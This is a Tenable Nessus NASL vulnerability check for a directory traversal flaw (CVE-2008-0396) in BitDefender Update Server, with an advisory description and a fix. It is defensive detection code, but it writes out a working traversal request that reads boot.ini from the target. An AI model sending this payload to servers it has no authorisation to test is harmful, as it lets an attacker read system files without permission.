#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(30021);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2008-0396");
  script_bugtraq_id(27358);
  script_xref(name:"OSVDB", value:"40518");

  script_name(english:"BitDefender Update Server Directory Traversal Vulnerability");
  script_summary(english:"Tries to retrieve a local file");

  desc = "
Synopsis :

The remote web server is affected by a directory traversal
vulnerability. 

Description :

The version of BitDefender Update Server running on the remote host
fails to sanitize request strings of directory traversal sequences,
which allows an unauthenticated attacker to read files outside the web
server's document directory. 

Note that the server runs with LocalSystem privileges by default. 

See also :

http://www.securityfocus.com/archive/1/486701/30/0/threaded
http://kb.bitdefender.com/KB421-en--Release-patch-for-Enterprise-Manager.html

Solution :

Apply the patch referenced in the vendor advisory above.

Risk factor :

High / CVSS Base Score : 7.8
(CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("bitdefender_update_server_detect.nasl");
  script_require_ports("Services/www");

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_kb_item("Services/www");
if (!get_kb_item("www/"+port+"/bitdefender_update_server")) exit(0);
if (!get_port_state(port)) exit(0);


# Try to exploit the issue.
file = "/../../../../../../../../../../../../boot.ini";
req = http_get(item:file, port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE, embedded:TRUE);
if (res == NULL) exit(0);


# There's a problem if looks like boot.ini.
if ("[boot loader]">< res)
{
  if (report_verbosity)
  {
    report = string(
      "Here are the contents of the file '\\boot.ini' that Nessus was able to\n",
      "read from the remote host :\n",
      "\n",
      res
    );
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
